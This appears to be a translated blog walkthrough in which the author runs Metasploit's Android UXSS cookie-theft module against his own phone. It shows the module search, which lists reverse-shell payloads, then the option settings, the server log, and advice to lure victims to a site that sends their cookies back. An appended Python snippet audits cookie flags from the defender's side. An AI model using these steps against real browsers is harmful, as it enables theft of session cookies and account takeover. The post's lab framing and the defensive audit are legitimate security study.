An attacker's general approach is to gather information first, locate a vulnerability, and then pick the technique that matches that particular vulnerability to compromise you. Below I use Metasploit to simulate a cross-site scripting attack (against my own phone).

1. Gather information
msf > search android

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft
   auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure
   auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber
   exploit/android/browser/samsung_knox_smdm_url              2014-11-12       normal     Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/webview_addjavascriptinterface     2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                        2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/multi/handler                                                       manual     Generic Payload Handler
   payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Dalvik Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Dalvik Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Dalvik Reverse TCP Stager
   payload/android/shell/reverse_http                                          normal     Command Shell, Dalvik Reverse HTTP Stager
   payload/android/shell/reverse_https                                         normal     Command Shell, Dalvik Reverse HTTPS Stager
   payload/android/shell/reverse_tcp                                           normal     Command Shell, Dalvik Reverse TCP Stager
As you can see, there are many exploitable Android vulnerabilities. Here I chose a UXSS (universal cross-site scripting) vulnerability; searching for it shows the module's detailed description.

In short, this vulnerability means that if the attacker succeeds, they can capture the cookies of your pages from your browser.

2. Next, select this vulnerability's module and look at its options.
msf > use auxiliary/gather/android_object_tag_webview_uxss
msf auxiliary(android_object_tag_webview_uxss) > show options

Module options (auxiliary/gather/android_object_tag_webview_uxss):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
   REMOTE_JS                        no        A URL to inject into a script tag in the context of the target URLs.
   SRVHOST      0.0.0.0             yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                yes       The local port to listen on.
   SSL          false               no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
   URIPATH                          no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer
From this you can see that the required fields are SRVHOST, SRVPORT and TARGET_URLS. This is the key part: in this step, what you have to do is set up your own site and embed in it the script that captures the cookies and sends them back!

Here I keep the default values for everything except SRVHOST, purely for demonstration. (Later I will point to a concrete example of how someone else carried out an XSS attack.)
msf auxiliary(android_object_tag_webview_uxss) > set SRVHOST 192.168.1.106
SRVHOST => 192.168.1.106
3. Assuming your script and your site are ready, type "exploit". Once the service has started you are almost done.
msf auxiliary(android_object_tag_webview_uxss) > exploit
[*] Auxiliary module execution completed
msf auxiliary(android_object_tag_webview_uxss) >
[*] Using URL: http://192.168.1.106:8080/ORvS7Li6X
[*] Server started.
4. Next, you need to find a way to get your site in front of people, then sit back and wait for the results.
[*] 192.168.1.105   android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
[*] 192.168.1.105   android_object_tag_webview_uxss - Sending initial HTML ...
[*] 192.168.1.105   android_object_tag_webview_uxss - Request 'GET /ORvS7Li6X'
[*] 192.168.1.105   android_object_tag_webview_uxss - Sending initial HTML ...
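As an added defender-side check that is not part of the original post: the module above works by running script inside the target site's origin and reading its cookies, so the first thing a site owner should verify is which cookies are even visible to script. This Python snippet audits Set-Cookie headers for the HttpOnly and Secure flags; the header values are constructed samples standing in for what a real target site would send.

```python
"""Audit Set-Cookie headers for the flags that limit what injected script can read."""
from typing import Dict, List, Tuple

# Constructed sample response headers (not from any real site).
SAMPLE_SET_COOKIE = [
    "sessionid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
    "csrftoken=def456; Path=/",
    "prefs=dark; Path=/; Secure",
]


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split one Set-Cookie header into name, value and a lowercase attribute map."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Flag attributes such as HttpOnly have no value; record them as True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def script_readable_cookies(headers: List[str]) -> List[str]:
    """Names of cookies that document.cookie would expose to a UXSS payload."""
    return [
        str(parse_set_cookie(h)["name"])
        for h in headers
        if "httponly" not in parse_set_cookie(h)["attrs"]
    ]


def audit(headers: List[str]) -> List[Tuple[str, List[str]]]:
    """Per cookie, list the missing hardening flags (empty list means fine)."""
    findings = []
    for h in headers:
        cookie = parse_set_cookie(h)
        attrs = cookie["attrs"]
        problems = []
        if "httponly" not in attrs:
            problems.append("readable by script (add HttpOnly)")
        if "secure" not in attrs:
            problems.append("sent over plain HTTP (add Secure)")
        findings.append((str(cookie["name"]), problems))
    return findings


if __name__ == "__main__":
    for name, problems in audit(SAMPLE_SET_COOKIE):
        print(name, "->", "; ".join(problems) or "ok")
```

HttpOnly keeps a cookie out of document.cookie but does not stop script running in that origin from sending requests that still carry it, so this narrows the damage rather than closing the hole; the real fix is updating the vulnerable browser or WebView.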
Postscript: this blog post does not go into how the script itself is designed and built; for a concrete approach, see this article.

Using an XSS vulnerability on me.jd.com in practice for basic-authentication phishing

Carrying out an XSS attack using Android's UXSS vulnerability